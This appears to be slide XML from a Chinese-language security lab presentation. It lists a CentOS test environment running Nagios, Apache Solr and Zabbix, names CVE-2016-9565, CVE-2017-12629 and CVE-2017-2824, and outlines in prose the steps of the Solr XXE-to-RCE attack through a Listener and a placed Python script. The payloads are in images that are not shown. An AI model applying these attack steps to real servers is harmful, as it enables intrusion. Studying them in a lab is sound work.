              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A84B68C4-FA04-4CE9-96C5-2F4A1093D3B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1918183"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PostMan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>插件，向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器发送一条包含上述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>请求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>收到的服务器的回复如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E24FD2B1-1284-4734-8098-60EFB4264C3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="2429882"/>
            <a:ext cx="4763135" cy="2183765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{320CE6CC-3E03-4070-BB3B-E25F7795E1E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5423900" y="4927912"/>
            <a:ext cx="5623511" cy="1645569"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25924525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564F139-50A7-482E-B29E-37101D498ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="339118"/>
            <a:ext cx="9905998" cy="1161069"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器环境</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="1210195"/>
            <a:ext cx="9905999" cy="2335213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyP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200" dirty="0" smtClean="0"/>
              <a:t>1.Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>CentOS 7</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200" smtClean="0"/>
              <a:t>2.Nagios</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>: 3.4.3</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200" dirty="0" smtClean="0"/>
              <a:t>3.ApacheSolr: 7.0.1</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3200" dirty="0" smtClean="0"/>
              <a:t>4.Zabbix: 2.4.8</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2564F139-50A7-482E-B29E-37101D498ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092201" y="3255416"/>
            <a:ext cx="9905998" cy="11610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zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="内容占位符 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190623" y="4522787"/>
            <a:ext cx="9905999" cy="233521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100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3112324" y="3907161"/>
            <a:ext cx="7106817" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Nagios </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>core</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>CVE-2016-9565</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t> XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>CVE-2017-12629</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t> RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>CVE-2017-12629</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>CVE-2017-2824</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Zabbix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> 2.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2050747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9830055-F8C0-44E2-A9F8-68A2E7C604F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="326970"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{51AB42E0-36AE-4867-96F7-ECF4B37A8235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1658143"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PostMan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>向服务器发送一条更新消息，以触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>收到服务器的回复如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C463A3B8-F8A5-49F5-92E9-D816B94A5718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="2367357"/>
            <a:ext cx="9052960" cy="2123286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C24725E9-91CB-4A7A-8DE4-C425A2D54E17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5605671" y="4715669"/>
            <a:ext cx="4901136" cy="2043349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16896998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15C89BF-FEBA-404F-B7DD-1B18DD6471E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F89FA634-D219-4534-AB6B-16AFFA35F932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击中读取文件的方式查看是否已经在服务器端放置好了攻击脚本。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>如果出现以下报错信息，可以知道服务器端不存在该文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>当服务器端已经存在了攻击脚本，即不出现上述报错，那么就可以进行下一步攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5D4ADC37-1A71-494D-8866-4EA857AD6EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="3881165"/>
            <a:ext cx="10723983" cy="404231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41230338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A49EFFC-866E-46BE-BEED-58D86325D9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="内容占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9CA971FC-3713-4D1B-BFBF-BB699973F3EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>update-listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的信息，该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的作用是在服务器端运行上述步骤中放置好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>脚本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{40E062D3-D772-47BF-85AF-05BF1E32A7CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257368" y="3429000"/>
            <a:ext cx="4286250" cy="2124075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8748471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28B9102-FB10-406D-AC31-DDCA8BC5D6E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="18732"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{84504EB8-1430-463D-8AA9-A21E16CABDA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
